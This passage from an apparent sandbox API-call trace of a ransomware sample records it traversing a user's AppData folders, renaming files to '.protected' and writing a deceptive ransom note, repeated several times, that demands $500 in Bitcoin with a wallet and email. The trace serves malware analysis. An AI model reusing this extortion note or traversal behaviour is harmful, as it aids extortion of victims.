1 [0089.280] CloseHandle (hObject=0x154) returned 1 [0089.280] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml.protected") returned 121 [0089.280] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml.protected")) returned 1 [0089.281] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.281] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.281] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\RESTORE_FILES.txt") returned 114 [0089.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.282] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.282] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.283] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.283] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.283] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.283] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.283] CloseHandle (hObject=0x150) returned 1 [0089.283] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.283] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.283] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\RESTORE_FILES.txt") returned 105 [0089.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.292] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.292] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.293] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.293] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.293] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.293] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.293] CloseHandle (hObject=0x14c) returned 1 [0089.294] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.294] lstrcmpiW (lpString1="Services", lpString2="Windows") returned -1 [0089.294] lstrcmpiW (lpString1="Services", lpString2="Program Files") returned 1 [0089.294] lstrcmpiW (lpString1="Services", lpString2="Program Files (x86)") returned 1 [0089.294] lstrcmpiW (lpString1="Services", lpString2="$Recycle.bin") returned 1 [0089.294] lstrcmpiW (lpString1="Services", lpString2="System Volume Information") returned -1 [0089.294] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services") returned 87 [0089.294] lstrcmpW (lpString1="Services", lpString2=".") returned 1 [0089.294] lstrcmpW (lpString1="Services", lpString2="..") returned 1 [0089.294] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*") returned 89 [0089.294] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.294] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.294] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.294] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.294] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.294] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.294] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\.") returned 89 [0089.295] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.295] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.295] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.295] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.295] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.295] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.295] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.295] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\..") returned 90 [0089.295] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.295] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.295] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.295] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.295] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\RESTORE_FILES.txt") returned 105 [0089.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\services\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.296] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.296] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.297] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.297] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.297] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.297] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.297] CloseHandle (hObject=0x14c) returned 1 [0089.297] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.297] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.297] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt") returned 96 [0089.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.297] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.297] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.298] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.298] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.298] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.298] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.298] CloseHandle (hObject=0xd8) returned 1 [0089.298] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0089.298] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0089.298] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\RESTORE_FILES.txt") returned 78 [0089.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.299] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.299] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0089.300] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.300] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0089.300] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.300] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0089.300] CloseHandle (hObject=0xd4) returned 1 [0089.300] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.300] lstrcmpiW (lpString1="Sun", lpString2="Windows") returned -1 [0089.300] lstrcmpiW (lpString1="Sun", lpString2="Program Files") returned 1 [0089.300] lstrcmpiW (lpString1="Sun", lpString2="Program Files (x86)") returned 1 [0089.300] lstrcmpiW (lpString1="Sun", lpString2="$Recycle.bin") returned 1 [0089.300] lstrcmpiW (lpString1="Sun", lpString2="System Volume Information") returned -1 [0089.300] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun") returned 54 [0089.300] lstrcmpW (lpString1="Sun", lpString2=".") returned 1 [0089.300] lstrcmpW (lpString1="Sun", lpString2="..") returned 1 [0089.300] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*") returned 56 [0089.300] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0089.301] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.301] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.301] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.301] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.301] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.301] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" 